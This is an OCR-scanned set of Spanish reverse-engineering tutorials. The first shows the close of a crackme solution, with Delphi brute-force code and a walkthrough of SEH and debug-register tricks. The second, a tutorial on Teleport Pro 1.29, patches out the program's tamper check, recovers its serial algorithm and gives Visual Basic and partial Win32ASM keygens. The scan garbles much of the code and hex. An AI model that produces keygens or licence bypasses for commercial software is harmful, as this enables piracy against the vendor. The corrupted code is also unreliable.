Para obtener estos cuatro caracteres nada mejor que un Fuerza Bruta. 
Yo lo hice en Delphi. 


var 
PNIZYOS<-"TpNiZzyas 
sigue:boolean; 


procedure TpNi2v3.GenerarClick (Sender: TObject); 
var 

bueno, Veax, palabra, palabro: Integer; 

Reax, Rebx,Recx, 1: Integer; 

palb: array[1..4] of byte; 

r_salir:boolean; 

F:TextFile; 

Nombre_F: String; 


begin 
Generar.Enabled:=false; 
Parar.Enabled:=true; 


Randomi ze; 
Nombre_F:=IntToStr (Trunc (Random(65535)))+'.txt'; (Las 
un fichero) 

AssignFile(F,Nombre_F); 


claves buenas las 


guardamos en 


1f FileExists(Nombre_F) 
Appena (F') 


else 


Rewrite(EF); 


bueno 


:=S775E5E5E; 


Veax:=$41542654; 
palabra:=$00000000; 
[1] :=palabra div $1000000; 


palb 


then 


palb[2]:=palabra div $10000; 
palb[3]:=palabra div $100; 
palb[4]:=palabra; 

palabro: 

sigue:=true; 

while (sigue) do 


begin 


(Empezamos con '0000') 


=palb[2]*51000000+palb[1]*510000+palb[4]1*$100+palb[3]; 


Label1.Caption:=chr ($30+palb[1])+chr ($30+palb[2])+chr ($30+palb[3])+chr ($30+palb[4]1); 
application.processmessages; 


Rebx: 
Rebx: 
Recx: 
Rebx: 
Recx: 
Reax: 
Rebx: 
Rebx: 
Rebx: 
Rebx: 


Recx 
Rebx 
Recx 
Reax 


=palabro; 

=Rebx div $10000; 
=Rebx; 
=Rebx*$10000; 
=Recx or Rebx; 
=(Veax xor Recx); 
=palabro; 

=Rebx div $10000; 
=Rebx*$10000; 
=palabro-Rebx; 
:=Rebx; 
:=Rebx*$10000; 
:=Recx or Rebx; 
:=Reax+Recx; 


(Cojo la 
ÍLa meto 
(Dejo la 


(Cojo la 


(Dejo la 


parte 
en la 
parte 


parte 


parte 


alta) 
parte baja de ecxj) 
alta en la parte alta de ebx) 


baja) 


alta en la parte alta de ebx) 


if Reax=bueno then (Si pasa el test guardamos la palabra) 
begin 


Lista.Items.Add (chr ($30+palb[2]) +chr ($30+palb[1])+chr ($30+palb[4])+chr ($30+palb[3])); 
Writeln(F,chr ($30+palb[2])+chr ($30+palb[1])+chr ($30+palb[4])+chr ($30+palb[3])); 


Flush (EF); 

end; 

i:=4; 
r_salir:=false; 
repeat 


if palb[i]=$2A then 
if i=1 then 
begin 
r_salir:=true; 
PararClick (Sender); 
end 
else 
begin 
palb[i]:=$00; 
dec (i); 
end 
else 
begin 
palb[il:=succ (palb[i]); 
r_salir:=true; 
end 
until (r_salir); 
palabro:=palb[1]*$1000000+palb[2]*$10000+palb[3]*$100+palb[41; (Repetimos hasta 
12222") 
end; 
end; 


Podeis comprobar que se chequean las cadenas desde '0000' hasta 'ZZZZ'. No miro las minúsculas porque el Serial no puede 
contenerlas. 


En muy poco tiempo el contenido del fichero es este: 


0A:W 1A9W 2A8W 3A7W 4A>W 5bA=W 6AAJ/W ?A3W (AJW AAIW BAHW CAGW 

DANW EAMW FALW GAKW HABW IAAW JAC(W KA?W LAFW MAEW NADW OACW 01:0 1190 2180 3170 41>0 5I=0 61 “7I;O 8120 
9110 :100 140 ?130 QIJO AIIO BIHO CIGO DINO EIMO FILO GIKO HIBO IIAO JIRO 

KI?0 LIFO MIEO NIDO OICO 


Uf! ¿son muchas no? Bueno sí, pero hay alguna que llama la atención: DINO, FILO, LIFO, NIDO 


Volviendo al código del crackme, si nos fijamos en la rutina que hay en 40130E (justo la nueva rutina de servicio de la INT 1) 


vemos esto: 


0040130E 
0040132B 
00401330 
00401335 
00401338 
0040133D 
0040133D 
0040133F 
00401342 
00401343 
00401345 
00401346 


Además de otras cosas, la rutina usa esos cuatro caracteres para desencriptar la zona de código que comentamos anteriormente y 


60 


BF 
B9 
cl 
Al 


pusha ; 


74 12 
78 00 
E9 02 
75 20 


loc_40133D: 


31 
83 
49 
75 
61 
CF 


07 xor 


dec ecx ; 


F8 3jnz short loc_40133D ; 
Pop all General Registers 
Interrupt Return 


popa ; 
iret ; 


que está en 401274. 


40 00 mov edi, 
00 00 mov ecx, 
shr ecx, 2 5; 
40 00 mov eax, 


[edi], 
C7 04 add edi, 4 ; 


CODE XREF': 
eax ; 
Add 

Decrement by 1 


Pues vamos a probar nuestras suposiciones: 


Nota: Para esta prueba se ha de tener en cuenta que lo primero que se ha hecho con esos cuatro bytes es restarles '0000' en 40120E. 


Push all General Registers 


offset byte_401274 

78h 

shift Logical Right 

dword_402075 
.text:00401343.3 

Logical Exclusive OR 


Jump if Not Zero 


(ZF=0) 


Cogemos una cadena, de las que creemos que pueden ser, al azar: 'NIDO' ;) 


La pasamos a hex: 4E 49 44 4F 
Le restamos 30303030: ie 19 14 1F 


Y con HexWorkShop hacemos un XOR con ese valor a la zona encriptada. Ante nuestros ojos podemos ver esto: 


NI2 CRACKME*+3 RESOLVED Ohhhhh, yeah. You know how a debugger and Windows work :) 


Creo que vamos bien... XDDDDD 


Si guardamos el exe modificado y lo desensamblamos con IDA vemos que la zona encriptada ya no lo está tanto: 


00401274 
00401275 
00401277 
00401278 
0040127D 
0040127E 
0040127F 
0040127F 
00401281 
00401298 
00401298 
004012D2 
004012D2 
004012D2 
004012D7 
004012D8 
004012DA 
004012DF 
004012E1 
004012E8 
004012E9 


nop 
push 0 
nop 

mov eax, 
nop 

push eax 


offset aNi2Crackme3Res 


jmp short loc_4012D2 


, 


"NI2 CRACKME+3 RESOLVED" 


, 


aNi2Crackme3Res db 
a0OhhhhhYeah_You db 
; DATA XREPF : 


sub_4011F1+El.o 


'NI2 CRACKMEF3 RESOLVED',0 ; 
'Ohhhhh, yeah. You know how a debugger and Windows work 


DATA XREF: sub_4011F1+87.0 


2) 0 


, 


loc_4012D2: ; 


CODE XREPF: 
offset aO0hhhhhYeah_You 


dword_402095 


pop large dword ptr fs:0 


mov eax, 
push eax 
push 0 
mov eax, 
call eax 
nop 

add esp, 


4 


, 


sub_4011F1+8E.]3 


"Ohhhhh, yeah. You know how a debugger a"... 


Está claro que el programa deberá llegar aquí para decirnos que hemos acertado con el Serial. 
Pero ¿cuando y cómo? 


Seguimos: 


Después de que nuestro Serial pase el primer test, viene esto: 


00401248 BE 47 13 40 00 mov esi, offset loc_401347 

0040124D 56 push esi 

0040124E OF B7 05 6D 20 40+ movzx eax, word_40206D ; Move with Zero-Extend 
00401255 35 35 18 00 00 xor eax, 1835h ; Logical Exclusive OR 

0040125A 2D 61 50 00 00 sub eax, 506l1lh ; Integer Subtraction 

0040125F 64 FF 30 push dword ptr fs: leax] 

00401262 64 89 20 mov fs: [eax], esp 


Una de las partes más interesantes del crackme (Chapó N12 :) 


Antes de ver lo que pasa aquí, os explico un poco de qué va la historia... El SEH !!!! 

El SEH (Structured Exception Handling) es la forma que tiene Windows de gestionar las excepciones que se puedan producir en un 
programa. Se trata de una estructura de datos que consiste en una o más rutinas de servicio que son interrogadas por Windows, 
cuando se produce una excepción, para ver quién se quiere encargar de gestionarla. Esta estructura es individual para cada Thread y 
se monta, normalmente, en la pila. FS:[0] apunta siempre a la cabeza de la lista de los manejadores de excepción y cada uno de ellos 
lleva un puntero al siguiente, menos el último cuyo puntero vale -1. 


Después de este rollo vamos a ver qué hace esta parte del código: 


Se guarda en la pila la dirección 401347. 

Luego se opera con los caracteres n'%s 1 y 2 de nuestro serial en EAX y se guarda el valor apuntado por FS:[EAX] en la pila. No es 
dificil ahora adivinar lo que debe valer EAX... CERO PATATERO ;) 

Lo que ha hecho es guardar la cabeza del SEH en la pila y a continuación carga en ES:[0] el valor de ESP 

Se consigue con esto mantener el SEH coherente y hemos añadido una rutina de manejo de excepciones a la lista :) 


Desde SICE se puede ver esta estructura: 


EDI=0000000C EBP=0063FB4C ESP=0063FB20 ElP=00401267 od ls ZabP c 
cs=014F DsS=0157 Sss=0157 ES=0157 FS=30F7 GS=0000 DS:00000000=9E 


byte PROT (0) 
30F7:00000000 20 FB 63 00 00 00 64 00-00 E0 63 00 06 2B 3F 24 .c...d...c..+?$ 
30F"7:00000010 30 52 00 80 00 00 00 00-D4 E9 5F 81 01 00 FF FF 0OR........_..... 
30F"7:00000020 00 00 00 00 DC AD 51 C9-27 27 00 00 5C EA 5F 81 ...... ON 


30E7:000900030' 74. 3D: 060::81: 22 22 22 2222 22 BRORLD IB RA VUE RA is ia 


Esta es la zona apuntada por FS:[0] y conocida como TIB (Thread Information Block) ¿Veis como el primer valor es 0063FB20? 
lo mismo que vale ESP en ese momento. 


Con la instrucción XFRAME de SOFTICE vemos el SEH antes: 


xFrame  XHandler xTable xScope 


0Ox63FF68 OxBFFB8CF8 OxBFFB8ED8 00 
try/except (0000) filter=0xBFF88E98, handler=0xBFF88EA1 


0Ox63FB88 OxBFF7192E 0x8B9E248F 00 
(scope table inaccessible) 


y después de añadir nuestro manejador: 


xFrame  XxHandler xTable xScope 


Ox63FF68 OXBFFB8CF8 OxBFFB8ED8 00 
try/except (0000) filter=0xBFF88E98, handler=0xBFF88EA1 


0x63FB88 OXBFF7192E 0x8B9E248F 00 
(scope table inaccessible) 


0Ox63FB20 0x401347 Ox63FB54 30130 
(scope table inaccessible) 


Recapitulemos: 
Tenemos la INT 1 desviada a nuestro código y tenemos un manejador de excepciones propio. 


Seguimos: 


00401265 33 CO xor eax, eax ;¿ Logical Exclusive OR 
00401267 C6 00 00 mov byte ptr [eax], O 

0040126A loc_40126A: ; CODE XREF: sub_4011F14+7F.3) 
0040126A EB 01 jmp short loc_40126D ; Jump 
0040126C 0F db OFh 

0040126D loc_40126D: ¿; CODE XREF: sub_4011F1+79.3 
0040126D EB 01 jmp short loc_401270 ; Jump 
0040126F 24 db 24h 

00401270 loc_401270: ¿; CODE XREF: sub_4011F1+7C.3 
00401270 EB F8 jmp short loc_40126A ; Jump 


Ponemos EAX a cero y en esa dirección escribimos un cero... pues qué bien. 
Luego en 40126A saltamos a 40126D que nos hace saltar a 401270 y que nos devuelve a 40126A ¿e...? 
Un bucle infinito ???? Noooo.... rebobinamos hasta: 


00401267 C6 00 00 mov byte ptr [eax], O 


Si EAX=0 estamos escribiendo en una zona de memoria QUE NO PERMITE LA ESCRITURA !!!! 
Consecuencia: ACCESS_FAULT !!! ¡Una excepción! ¡Qué casualidad! 
¿Quién se hará cargo de esa excepción? Pues CASUALMENTE nuestro manejador en 401347. 


Nota: Cuando ocurre una excepción Windows pasa al Ring-0 y allí ejecuta los manejadores de excepción 


Para pillarlo, antes de ejecutar el MOV [EAX],0 metemos un BreakPoint en 401347 y le damos a FS. 
¡Premio!, estamos en SOFTICE., 


Ahora prepararos para los malabarismos de Ni2: 


00401347 OF B7 05 6F 20 40+ movzx eax, word_40206F ; Move with Zero-Extend 
0040134E 35 D2 BA 00 00 xor eax, OBAD2h ; Logical Exclusive OR 

00401353 2D AB 25 00 00 sub eax, 25ABh ; Integer Subtraction 

00401358 35 E0 DO 00 00 xor eax, ODOEOh ; Logical Exclusive OR 

0040135D 8B 1C 04 mov ebx, [espt+eax] 


En EAX mete los caracteres 3 y 4 de nuestro serial, los marea un poco y obtiene un puntero a una zona de la pila en EBX. 


00401360 C7 43 10 74 12 40+ mov dword ptr [ebx+10h], offset 401274 


Luego usando ese puntero y sumándole un ofsset de 10h, mete 401274. 


00401367 OF B7 05 71 20 40+ movzx eax, word_402071 ; Move with Zero-Extend 
0040136E 2D 42 48 00 00 sub eax, 4842h ; Integer Subtraction 


Ahora coge los caracteres 5 y 6 del Serial y les resta 4842h 


00401373 89 43 18 mov [ebx+18h], eax 


Usando el puntero anterior y el ofsset 18h, mete el valor obtenido en EAX. 


00401376 C7 83 B8 00 00 00+ mov dword ptr [ebx+0B8h], offset 401274 


Y en el ofsset B8h vuelve a guardar 401274 


00401380 33 CO xor eax, eax ; Logical Exclusive OR 
00401382 C3 retn ; Return Near from Procedure 


Termina con EAX=0 y retorna. 
¿Y qué cojones ha hecho? 


Eso mismo me pregunté yo durante un tiempo... La solución: 


En un artículo estupendo de Matt Pietrek sacado del Microsoft Systems Journal (Enero 1997), Matt explica el mecanismo de las 
excepciones en Windows. Resulta, que cuando Windows detecta una excepción mira a ver si hay manejadores buscando en el TIB y 
si es así, mete en la pila cuatro punteros: 


ExceptionRecord 
EstablisherFrame 
ContextRecord 
DispatcherContext 


Si miramos la pila vemos esto: 


EDI=0063FA28 EBP=0063F978 ESP=0063F958 ElP=00401347 od ls ZabP c 
cs=014F DsS=0157 ss=0157 ES=0157 FS=30F7 GS=0000 DS:0040206F=4C45 


byte PROT (0) 
0157:0063F958 80 67 F7 BF 28 FA 63 00-20 FB 63 00 44 FA 63 00 .g..(.c. .c.D.c. 
0157:0063F968 00 FA 63 00 20 FB 63 00-8C 67 F7 BF 20 FB 63 00 ..C. .C..Q.. .C. 
0157:0063F978 10 FA 63 00 F3 58 F8 BF-28 FA 63 00 20 FB 63 00 ..C..X..(.C. .C. 
0157:0063F988 44 FA 63 00 00 FA 63 00-47 13 40 00 0C 00 00 00 D.c...c.G.t..... 


0157:0063F998 47 13 40 00 00 00 14 1F-7E 16 44 89 00 00 00 00 G.G..... a 
0157:0063F9A8 00 00 00 00 00 00 00 00-24 8A A8 9D EF 04 04 8A ........ e a E 
0157:0063F9B8 3F 24 00 01 54 89 3F 24-00 00 00 00 F4 08 4F 06 28..T.?8...... O. 
0157:0063F9C8 70 F4 4F 06 08 00 5A 8A-3F 24 4B 01 50 01 22 F4 p.0...Z.?$K.P.". 
0157:0063F9D8 FE 05 4F 06 00 00 FE 05-50 01 40 01 02 00 00 00 ..0O..... Pla 
0157:0063F9E8 4E 20 EC 0D 00 00 00 00-00 00 08 00 4E 01 46 01 N .......... N.F. 
0157:0063F9F8 00 00 00 00 F4 3D 60 81-00 00 00 00 00 00 00 00 ..... o ara 
0157:0063FA08 C4 E9 5F 81 00 00 00 00-4C FB 63 00 D7 BA EC EF .._..... Das ds 


0157:0063FA18 44 FA 63 00 28 FA 63 00-0D 00 00 00 00 00 00 00 D.C.(.C......... 


0157:0063FA28 05 00 00 CO 00 00 00 00-00 00 00 00 67 12 40 00 ............ g.f. 
0157:0063FA38 02 00 00 00 00 00 00 OO-EFF FF FF FF 1F 00 01 00 .....ooooooo.... 
0157:0063FA48 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cccooccooooo.... 
0157:0063FA58 FO 4F FF FF 3F 04 00 00-7F 02 FF FF 00 00 FF FF .0..?...81277....... 
0157:0063FA68 FF FF FF FF 00 00 00 00-00 00 00 00 00 00 00 00 .....cooooooo.... 
0157:0063FA78 00 00 FF FF 00 00 00 00-00 00 00 00 00 00 00 00D ....cooooooo.... 
0157:0063FA88 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..ccoocooooo.... 
0157:0063FA98 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cccooccooooo.... 
0157:0063FAAS8 00 00 00 00 00 00 00 38-33 33 33 33 33 D3 03 40 ....... 833333..4 


0157:0063FAB8 00 00 00 00 00 00 4E D1-0E 40 00 00 00 00 00 00 ...... Nica lud 
0157:0063FAC8 00 00 00 00 0A 00 00 00-00 00 00 00 E7 30 00 00 .....oooo.... 0.. 
0157:0063FAD8 57 01 00 00 57 01 00 00-0C 00 00 00 47 13 40 00 W...W....... G.f. 
0157:0063FAE8 00 00 14 1F 01 00 00 00-14 1F 14 1F 00 00 00 00 .....oooooooo.... 
0157:0063FAF8 4C FB 63 00 67 12 40 00-4F 01 00 00 46 02 00 00 L.c.g.t.O0...F... 
0157:0063FB08 20 FB 63 00 57 01 00 00-77 16 F6 BF 00 70 63 00 .c.W...w....pc. 
0157:0063FB18 5C 8B FB 3C 22 F4 A8 8B-88 FB 63 00 47 13 40 00 X..<"..... c.G.f. 
0157:0063FB28 54 FB 63 00 C4 8B 00 00-4C FB 63 00 48 FB 63 00 T.c..... L.c.H.c. 


La primera doble palabra es la dirección de retorno... Ni caso. 

La segunda es nuestro primer parámetro: Un puntero al ExceptionRecord 

La tercera el segundo parámetro: Un puntero al EstablisherFrame ¿Os suena la dirección? 
La cuarta el tercer parámetro: Un puntero al ContextRecord 


Éste es el que nos interesa. El Registro de Contexto almacena todos los registros del procesador cuando se produjo la excepción 
(estareis hartos de verlos en los mensajitos de Windows: "Este programa ha efectuado una operación no válida y bla, bla, bla...) 


Pues usando ese parámetro como puntero en EBX, a 10h bytes de distancia está el valor que tenía el DR3 (Debug Address Register) 
(en este caso: 00000000) y en él introduce 00401274. 

A 18h bytes está el valor del registro DR7 (Debug Control Register) y ahí mete el valor que calculó en EAX. Luego en el offset B8h 
está lo que tenía EIP: 00401267 (La dirección de la instrucción que causó la excepción) y lo sustituye por 00401274. 


¿Qué dices que ha hecho? 


Ha puesto un BreakPoint de Ejecución en el registro de depuración 3 (DR3) en la dirección 401274, la ha habilitado con el valor 
introducido en DR” y ha cambiado EIP para que continúe, a la vuelta de la excepción, en esa dirección: 401274. Cuando Windows 
devuelva el control al programa y se recupere su Contexto desde esta zona (se cargan los registros) se continuará la ejecución en la 
dirección a la que apunta ahora EIP: 401274. 


Pero, un momento, aún no hemos desencriptado esa zona !!!! 
Para eso está el BreakPoint, en cuanto se intente ejecutar la instrucción que hay en 401274 saltará el BP y se producirá una 
interrupción... casualmente, otra vez, la INT 1. 


S1 recordais la rutina de servicio estaba en 40130E: 


0040130E 60 pusha ; Push all General Registers 

0040130F OF B7 05 73 20 40+ movzx eax, word_402073 ; Move with Zero-Extend 
00401316 35 31 59 00 00 xor eax, 5931h ; Logical Exclusive OR 

0040131B 2D 74 04 00 00 sub eax, 474h ; Integer Subtraction 

00401320 BB 28 13 40 00 mov ebx, offset dword_401328 


00401328 OF 23 F8 mov dr7, eax 


«.. Esto ya lo conoceis 
00401346 CF iret ; Interrupt Return 


Ahora usa los caracteres 7 y 8 del Serial para calcular un valor en EAX que mete en DR7. ¿Para qué? 
Para deshabilitar la interrupción que habilitó antes... ya no la necesita :) 


Luego, como hemos visto, desencripta el código y al volver de la interrupción se encuentra con el código perfectamente ejecutable 
para mostrarnos el mensajito de CRACKME RESOLVED !!! 
Además, elimina el manejador de excepciones que introdujo, con la instrucción: POP FS:[0] 


Sólo queda por ver que cuando salimos del programa se ejecuta la rutina que está en 401383 y lo que hace es restaurar el valor 
previo de la rutina de servicio de la INT 1. 


conclusiones 


¿Cómo he resuelto cada parte del Serial? 


Caracteres 1 y 2: 
El resultado en EAX debía ser O luego en 40125A EAX debía valer: 5061h y por lo tanto 5061h XOR 1835h = HT (no confundir el órden: "TH') 


Caracteres 3 y 4: 
El desplazamiento hasta el puntero al ContextRecord es OCh, luego deshaciendo las operaciones entre 40134E y 401358 -'ElL' 


Caracteres 5 y 6: 

El valor que se debe introducir en DR7 debe habilitar el BreakPoint que hay en DR3, luego las soluciones son múltiples: 'Ax', 'xB', 'x2' (La x puede ser cualquier valor) 
Caracteres 7 y 8: 

Ahora el valor que se mete en DR7 ha de ser tal que el byte en la parte baja sea 00. También hay varias posibilidades: 'Ex' 

Caracteres 9, 10, 11 y 12: 

Fuerza Bruta. ='NIDO' 


Luego los serials válidos tienen la forma: THELAXExNIDOxxxx ó THELxBExNIDO ó THELx2ExXNIDO etc... 


Bueno, se acabó. Espero que hayais aprendido (los que no lo sabierais) lo mismo que yo con este crackme. HE DISFRUTADO !!! Saludos. Crick 


para saber mas 


INTEL 80386 PROGRAMMER'S REFERENCE MANUAL 1986 capítulos 9 y 12 
http://webster.cs.ucr.edu/Page_asm/Doc386/ o en la web de Intel. 


A Crash Course on the Depths of Win32 Structured Exception Handling, MSJ January 1997 
http://microsoft.com/msj/0197/exception/exception.htm 


. Todo el material aquí editado es para uso exclusivamente didáctico. 
¿Dudas? ¿Comentarios? ... (o Escríbeme Ñ e á ! 
Crick NO se responsabiliza del uso ilegal de este material. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 
Programa: Teleport Pro 1.29.1590 


PROTECCION: Name / Serial 
Objetivo: Hacer un Keygen (o dos) 


Parece que sirve para bajarse páginas web enteras, pero no sé si 


AOpen: va bien o no, porque aún lo estoy evaluando :0) 
Dificultad: Novato 

DOWNLOAD: http://www .tenmax.com/teleport/pro/download.htm 

Herramientas: Softice, W32dasm, Visual Basic y Win32ASM 

CRACKER: Caos reptante FECHA: 20/02/2001 


INTRODUCCION 


El creador de este programa se ha lucido, al menos en lo que a su protección se refiere. Como veremos más 
adelante, trata de impedir la modificación del programa (desde luego sin conseguirlo), y en cambio permite 
descubrir con toda facilidad el serial number correcto. La rutina de generación del número está rodeada de 
un código inútil que efectúa una serie de cálculos que se repiten varias veces y que no sirven para nada. Sin 
embargo, al llegar a la rutina (que ocupa unas pocas líneas de código), no hay problema para ver su 
funcionamiento. En fin, el objeto de este trabajo no es tanto el desproteger este programa, sino ver como se 
hace un keygen... o dos. :0) 


AL ATAKE 


Consideraciones previas... 


Empezaremos con el W32Dasm para ver con qué nos enfrentamos. Si miramos las String Data References, 
tendremos una muestra de la maldad humana: 


"Hello, New User! Your free evaluation period for this share" 
"Hello again! You're halfway through the free evaluation per" 
"Hello again! After this session, you will have only one mor" 
"Hello again! This session marks the end the free evaluation" 
La verdad es que este tío es un palizas. 


"We're sorry! The registration number you entered appears to" 
"We're terribly sorry, but this copy of Teleport Pro appears "” 
Me da la impresión de que hasta tienen lista negra de números pirateados. 


Por si tratamos de tocarle las tripitas al programa: 
"This program has been altered, possibly by a virus; program execution will stop now.' 
¡Llamarme virus a mí! ¡Te vas a enterar! 


, 


Pero al final triunfaremos: 
"Thank you! Your copy of Teleport Pro is now registered. Al" 


Como somos optimistas, buscamos esta última cadena y encontramos: 


:00426941 E896090000 call 004272DC 

:00426946 3945E8 cmp dword ptr [ebp-18], eax 
:00426949 59 pop ecx 

:0042694A 753A jne 00426986 

:0042694C A184E44700 mov eax, dword ptr [0047E484] 
:00426951 8945F0 mov dword ptr [ebp-10], eax 


* Possible Reference to String Resource ID=07026: "Thank you! Your copy of Teleport Pro is 
now registered. Al" 


:00426954 68721B0000 push 00001B72 


Aquí vemos inmediatamente que el meollo de la cuestión está en el ¡ne 00426986 que nos aleja del premio. 
Podríamos invertir el salto, pero sólo serviría para que el programa nos diga que estamos registrados, aún sin estarlo 
realmente. 


¿Qué cómo vamos a invertir el salto si el programa no se deja tocar? muy fácil: 


:0040B8CE A110C74700 mov eax, dword ptr [0047C710] 
:0040B8D3 3B30 cmp esi, dword ptr [eax] 

:0040B8D5 7413 je 0040B8EA 

:0040B8D7 53 push ebx 

:0040B8D8 53 push ebx 


* Possible StringData Ref from Data Obj ->"This program has been altered, " 
-=>"possibly by a virus; program execution " 

-=>"will stop now." 

:0040B8D9 6820C74700 push 0047C720 

:0040B8DE E847FF0300 call 0044B82A 


Sólo hay que invertir el salto en 40B8DS5. 


Pero dejémonos de perder el tiempo. Ejecutamos el Symbol Loader, cargamos el programa, y cuando aparece el 
Softlce, como ya sabemos donde queremos ir, tecleamos g 42694a. Cuando arranca el programa, vamos a 
registrarnos; introducimos nuestro nombre y un número mágico (Yo pongo: "Caos reptante" y "932345678". 
Aceptamos, salta el Softlce y aparecemos en el lugar del salto. Ahora se trata de ver que es lo que comparaba: 


:00426941 E896090000 call 004272DC 

:00426946 3945E8 cmp dword ptr [ebp-18], eax 
:00426949 59 pop ecx 

:0042694A 753A jne 00426986 


¿Qué hay en EAX? 66DECBA9 Bonito número :0) y ¿qué hay en EBP-18? tecleamos d ebp-18 (la dirección es 
70F468) y vemos que hay 4E779237 ¿y si...? vamos a ver: entramos ? 3792774e y ¡SÍ! 3792774E 932345678 
"7" wN". Así pues el número bueno debe ser: ? 66decbad9 y el resultado que nos aparece és: 66DECBA9 


1725877161 "fpÉr". Como diría el Profesor X: ¡Este arroz ya se coció! 


Cálculo del serial correcto... 


Ya hemos descubierto nuestro serial number y podemos registrar el programa a nuestro nombre, pero en vista de la 
mala intención y la soberbia demostrada por el programador :o( creo que no es suficiente castigo. Así pues, vamos a 
programar un keygen, o mejor dos :0) 


Volveremos a cargar el programa en el Symbol Loader, y repetiremos el proceso anterior, poniendo esta vez: g 
426941. Cuando lleguemos a este punto, entraremos en el call. Tracearemos pacientemente con Fl10 para evitar la 
ejecución paso a paso del call 420940, que se repite varias veces durante el proceso y que no debemos seguir, si no 
queremos que el programador nos lleve de paseo. Llegaremos a un punto de interés: 


:004272F0 83F805 cmp eax, 00000005 
:004272F3 7304 3nb 004272F9 
:004272F5 33C0 xor eax, eax 
:004272F7 5F pop edi 

:004272F8 C3 ret 


aquí comprueba la longitud de nuestro nombre, y si es menor de cinco caracteres, nos manda por donde hemos 
venido. En caso contrario, continuamos: 


:004272F9 53 push ebx 

:004272FA 56 push esi 

:004272FB BEA4E4FE5D mov esi, 5DFEE4A4 
:00427300 33DB xor ebx, ebx 


antes de entrar en el bucle, carga su número de la suerte en ESI y pone EBX a O. Empieza el bucle que genera el 
serial válido: 


:00427302 85FF test edi, edi 
:00427304 7409 je 0042730F 
:00427306 57 push edi 

:00427307 E834560000 call 0042C940 


Otra vez el call 420940, pero ni caso. 


:0042730C 59 pop ecx 

:0042730D EBO02 jmp 00427311 
:0042730F 33C0 xor eax, eax 
:00427311 83C0FC add eax, FEFFFFEC 
:00427314 3BD8 cmp ebx, eax 
:00427316 730C jnb 00427324 


EAX contiene la longitud de nuestro nombre, se le resta 4 y se compara con EBX que en principio está a O, y sale del 
bucle si es igual o menor. A continuación veremos que se incrementa EBX, por lo que el bucle se repite tantas veces 
como caracteres tiene el nombre, menos 4. En nuestro caso, serán 9 veces. 


:00427318 33343B xor esi, dword ptr [ebx+edi] 


Aquí está. En este momento ESI contiene el valor 5SDFEE4A4 introducido anteriormente, y en la dirección señalada 
por EBX (009343E0), el valor 736F6143 que es el código ASCII de "soaC". Hemos visto que EBX vale 0, pero que 
se incrementa a cada ejecución del bucle, por lo que la segunda operación XOR se hará entre 2E9185E7 (resultado 
de la 1* operación) y 20736F61 (" soa") y así sucesivamente hasta 9 veces. La última operación se hará entre 
12BOAADD y 746E6174 ("tnat") y dará como resultado 66DECBAS9, en decimal: 1725877161, o sea, nuestro 
número válido :0) 


:0042731B F6C340 test bl, 40 
:0042731E 7401 je 00427321 
:00427320 43 inc ebx 
:00427321 43 inc ebx 
:00427322 EBDE jmp 00427302 


Si el nombre es muy largo, a partir de los 64 caracteres incrementa EBX dos veces en vez de una. Será para abreviar 
el proceso... 


Una vez que salimos del bucle, vemos: 


:00427324 8BC6 mov eax, esi 
:00427326 5E pop esi 
:00427327 5B pop ebx 
:00427328 5F pop edi 
:00427329 C3 ret 


Pone el número válido en EAX y vuelve para efectuar la comprobación y echarnos a los cocodrilos, si puede. 


Ya hemos terminado con el programa y ahora vamos a hacer el keygen. Haremos uno en Visual Basic y otro 
utilizando el Win32ASM. Esperemos que los números que den uno y otro sean los mismos :0) ... 


Keygen en Visual Basic... 


Para hacer nuestro keygen en Visual Basic, empezaremos creando un formulario con dos ventanas de texto (Textl 
para el nombre y Text2 para el serial) y dos botones (Command1 para "Generar" y Command2 para "Terminar”). El 
código del botón "Generar" debe ser más o menos así: 


Private Sub Command1l_Click() 
nombre = Textl.Text 
longitud = Len (nombre) 

If longitud < 5 Then 
extl.Text = "" 


ext2.Text = "¡Mínimo 5 caracteres!" 
Exit Sub 
End If 
For f = 1 To longitud -— 1 
Cadena = Hex(Asc(Mid(nombre, f, 1))) £ cadena 
Next f 
res = Val ("s«H5DFEE4A4") 
For f = 1 To longitud -— 4 
opl = Val("sH" £ Mid(cadena, Len(cadena) - (2 * f + 5), 8)) 
o0p2 = res 
res = opl Xor op2 
If f > 64 Then 
f=f+1 
End If 
Next f 
Text2.Text = Val (res) 
End Sub 


Y el del botón "Terminar": 


Private Sub Command2_Click() 
Unload Me 
End Sub 


Creo que está bastante claro y no hacen falta comentarios. 


Keygen en ASM... 


Para hacer nuestro keygen con Win32ASM, necesitaremos dos archivos. El de recursos: rsrc.rc y el del código: 
keygen.asm. 


En el primero de ellos, definiremos todos los elementos que aparecen en el programa, con sus atributos, posición y 
tamaño. Podría ser algo parecido a esto: 


tinclude "Amasm32Xincludel*resource.h" 
fdefine IDD_DIALOG 1000 


tdefine IDC_NAME 1001 
tdefine IDC_SERIAL 1002 
tdefine IDC_GEN 1003 
tdefine IDC_EXIT 1004 
tdefine IDC_STATIC -1 
keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,112,65 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Teleport Pro 1.29.1590" 

FONT 10, "MS Sans Serif" 


[o) 
(ña! 


EGIN 
TEXT "Nombre", IDC_STATIC,8,6,28,12 

TEXT "Serial",IDC_STATIC,8,26,28,12 

EDITTEXT IDC_NAME,36,6,67,12,ES_AUTOHSCROLL | ES_CENTER 
E EXT IDC_SERIAL,36,26,67,12, ES_CENTER | ES_READONLY 
PUSHBUTTON "Generar", IDC_GEN,8,45,40,14 
P U 


ON "Terminar", IDC_EXIT,63,45,40,14 


La primera definición (+tinclude...) es genérica y la ponemos para no tener que definir lo que no es propio de nuestro 
programa como: WS_CAPTION, ES_AUTOHSCROLL etc. 

Permitimos el scroll horizontal porque el texto del nombre puede ser largo. Para evitar la introducción de texto en la 
casilla del número ponemos el read only. Por lo demás, creo que más o menos se ve de qué va. 


El fichero del código podría ser algo así: 


.386 

.model flat,stdcall 

option casemap:none 

include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


«Const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
